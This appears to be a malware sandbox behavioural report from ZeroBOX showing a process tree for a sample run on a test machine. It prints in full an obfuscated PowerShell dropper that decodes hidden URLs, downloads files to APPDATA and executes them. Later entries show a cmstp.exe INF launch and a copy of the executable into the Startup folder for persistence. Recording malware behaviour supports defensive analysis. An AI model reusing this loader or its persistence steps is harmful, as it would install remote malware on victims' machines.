| ZeroBOX

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\venture45.hta
2560
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kTAPX($whVhTP, $wgoNDQ){[IO.File]::WriteAllBytes($whVhTP, $wgoNDQ)};function sJkqoCLtF($whVhTP){if($whVhTP.EndsWith((iRVrfw @(37574,37628,37636,37636))) -eq $True){Start-Process (iRVrfw @(37642,37645,37638,37628,37636,37636,37579,37578,37574,37629,37648,37629)) $whVhTP}else{Start-Process $whVhTP}};function LFuvhloI($IjWpK){$BBYenLHq = New-Object (iRVrfw @(37606,37629,37644,37574,37615,37629,37626,37595,37636,37633,37629,37638,37644));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$wgoNDQ = $BBYenLHq.DownloadData($IjWpK);return $wgoNDQ};function iRVrfw($cPcmspjt){$VFROSVY=37528;$uuolpFGi=$Null;foreach($GDbxHrfK in $cPcmspjt){$uuolpFGi+=[char]($GDbxHrfK-$VFROSVY)};return $uuolpFGi};function iHiOJeOT(){$SrcVb = $env:APPDATA + '\';$xhXqj = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37577,37579,37579,37583,37648,37574,37644,37648,37644));$UmbJSaI = $SrcVb + '1337x.txt';kTAPX $UmbJSaI $xhXqj;sJkqoCLtF $UmbJSaI;;$ywjaqdxl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37648,37640,37636,37625,37649,37628,37574,37632,37644,37625));$PIZfdML = $SrcVb + 'xplayd.hta';kTAPX $PIZfdML $ywjaqdxl;sJkqoCLtF $PIZfdML;;$OAXyl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37597,37642,37636,37638,37626,37574,37629,37648,37629));$DSRYp = $SrcVb + 'Erlnb.exe';kTAPX $DSRYp $OAXyl;sJkqoCLtF $DSRYp;;}iHiOJeOT;
  2648
  - notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\1337x.txt
    2844
  - mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\test22\AppData\Roaming\xplayd.hta"
    2924
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -File C:\Users\Public\RoLg.ps1
      3004
      - cmstp.exe "cmstp.exe" C:\Users\Public\user.inf /au
        152
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jdaqmeqs.cmdline"
        2228
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES13B3.tmp" "c:\Users\test22\AppData\Local\Temp\CSC13A2.tmp"
        2212
  - Erlnb.exe "C:\Users\test22\AppData\Roaming\Erlnb.exe"
    604
    - Powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\test22\AppData\Roaming\Erlnb.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Erlnb.exe' -Force
      2544
    - Erlnb.exe "C:\Users\test22\AppData\Roaming\Erlnb.exe"
      2760

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents